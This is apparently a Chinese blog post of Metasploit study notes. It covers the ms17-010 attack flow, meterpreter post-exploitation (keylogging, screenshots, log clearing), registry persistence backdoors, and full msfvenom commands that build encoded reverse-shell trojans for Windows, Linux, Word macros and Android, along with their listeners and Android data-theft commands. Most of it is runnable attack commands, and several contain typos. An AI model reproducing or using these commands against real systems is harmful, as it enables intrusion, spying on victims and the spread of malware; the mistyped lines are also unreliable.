MSF(Metasploit)学习笔记
知道MSF好久了,全称是metasploit ,可以自行安装,不过一般直接使用kali里的,不过一直以来没有记录感觉没有很好的掌握,来浅浅记录一次吧!
启动
有三种启动方式,msf可以直接使用,不一定要启动数据库
- 启动数据库的后再启动msf
systemctl start postgresql msfconsole
- 启动数据库,同时启动msf
msfdb run
- 只启动msf
msfconsole
简单使用
- 获取帮助
help ?
- 搜索
search
语法type: path: name: rank: platform:
- 使用某个模块
use xxx
- 查看相关参数的设置
show options
- 查看模块信息
info
- 需要需要填写的参数
show missing
- 显示可攻击的目标
show targets
- 退出模块
back
- 设置/取消设置选项中的参数
set/unset
- 开始攻击
exploit/run
攻击流程
- 搜索漏洞相关
search ms17-010
- 选择模块
use xxx
- 设置参数
set rhosts xxx
- 发起攻击
run/exploit
挂到成功后挂到后台
exploit -j
信息收集
- db_nmap扫描
db_nmap -sP 192.168.79.0/24 db_nmap -sT 192.168.79.0/24 db_nmap -sV 192.168.79.0/24
- 查找漏洞
nmap --scripts=vuln 192.168.79.134
- 查找CVE 模块 配置参数 设置payload
meterpreter
攻击成功后就会进入meterpreter
界面
- 常用命令
background sessions ps getuid sysinfo getsystem getpid execute -f 1.exe upload xxx c:\\
run scraper cd cat rm edit run post/windows/gather/enum_applications screenshot keyscan_start keysacn_dump keyscan_stop run vnc
- 进程迁移 后可以进行该进程的 键盘监听
migrate pid(424)
- 遇到的问题
- vnc 不能交互,在目录/usr/share/metasploit-framework/scripts/meterpreter/,下找到vnc.rb文件
pay声明的位置添加pay.datastore['ViewOnly'] = false
- vnc 不能交互,在目录/usr/share/metasploit-framework/scripts/meterpreter/,下找到vnc.rb文件
生成持续性后门
- 注册表的方式,设置参数
use exploit/windows/local/persistence set set run
- 监听端口
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.79.131
- 清除日志
clearev
制作windows恶意软件
- 一次编码生成exe木马
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.79.131 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/1.exe
- 两次编码生成exe木马
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.79.131 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 20 |msfvenom -a x86 --platform -e x86/alpha_upper -i 10 -f exe -o /var/www/html/2.exe
- 绑定的真实的程序,非主程序
msfvenom -a x86 --platform windows -p windows/meterpreter_tcp LHOST=192.168.79.131 LPORT=4444 -b "\x00" -e x86/shikatu_ga_nai -i 10 -x xxx.exe -f exe -o /var/www/html/3.exe
制作Linux恶意软件
- 制作
msfvenom -a x64 --platform linux -p linux/x64/meterpereter/reverse_tcp LHOST=192.168.79.131 LPORT=4444 -b "\x00" -i 10 -f elf -o /var/www/html/msb
- 开启监听
use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp run
制作文档宏病毒
- 生成宏和payload
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.79.131 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f vba-exe
- 新建文档,复制宏,和payload到内容
- 开启监听
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp run
制作安卓木马
- 生成apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.1168.79.131 LPORT=4444 R > a.apk
- 开启监听
use exploit/multi/handler set payload android/meterpreter/reverse_tcp run
- 使用-x参数添加模板应用时,会报错,不能正常生成
- 使用github的项目来使用模板apk来生成木马apk源代码仓库
常见的anroid指令
check_root
dump_calllog
dump_contracts
dump_sms
geolocate
send_sms
wlan_geolocate
app_install
app_list
app_run
app_uninstall
版权声明:
作者:qiankong
链接:https://bravexist.cn/2023/12/msf-metasploit-study-notes.html
文章版权归作者所有,未经允许请勿转载。
THE END